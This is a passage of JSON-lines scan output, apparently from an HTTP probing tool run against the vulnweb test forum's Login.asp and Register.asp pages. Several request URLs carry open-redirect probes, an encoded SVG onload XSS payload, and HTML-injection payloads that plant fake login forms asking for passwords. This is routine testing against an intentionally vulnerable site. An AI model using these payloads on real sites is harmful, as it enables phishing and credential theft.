login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D35\",\"time\":\"352.5768ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:03.878595082Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D36\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D36\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D36\",\"time\":\"349.793161ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:03.883157802Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D39\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D39\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D39\",\"time\":\"342.924209ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:03.8956556Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D41\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D41\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D41\",\"time\":\"345.089786ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:03.900684435Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D45\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D45\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D45\",\"time\":\"347.289509ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3218,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.175496419Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D5\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D5\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D5\",\"time\":\"348.493601ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.234034018Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D6\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D6\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowthread.asp%3Fid%3D6\",\"time\":\"343.181136ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.269230104Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp?Cookie:\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp?Cookie:\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=/Default.asp?Cookie:\",\"time\":\"344.234516ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.292355849Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=4290\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=4290\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=4290\",\"time\":\"356.427446ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3168,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.319904976Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"time\":\"348.711615ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.418448966Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=http://webhacking.kr\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=http://webhacking.kr\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=http://webhacking.kr\",\"time\":\"339.488312ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3216,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.610146423Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp\",\"input\":\"http://testasp.vulnweb.com/Register.asp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp\",\"time\":\"344.642368ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3617,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.652380652Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"time\":\"353.335624ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3615,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.665335942Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FDefault%2Easp%3FCookie%3A\",\"time\":\"353.313001ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.666533497Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FLogin%2Easp%3F\",\"time\":\"343.41035ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3611,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.678652257Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FRegister%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FRegister%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FRegister%2Easp%3F\",\"time\":\"343.22284ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3617,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.684512858Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin.asp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FLogin.asp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FLogin.asp%3F\",\"time\":\"355.324187ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3611,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.728028788Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch\",\"time\":\"355.569923ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3629,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.781844817Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"time\":\"409.141321ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3613,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:04.887176412Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D\",\"time\":\"357.381679ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.178249159Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253\",\"time\":\"345.734248ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3647,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.179484478Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E\",\"time\":\"344.656309ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3937,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.201161181Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E\",\"time\":\"348.075872ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4797,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.211893954Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E\",\"time\":\"343.116014ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":4823,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.214684747Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B\",\"time\":\"353.196356ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3731,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.214980381Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi\",\"time\":\"357.374872ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3709,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:14.222990323Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F\",\"time\":\"340.560396ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 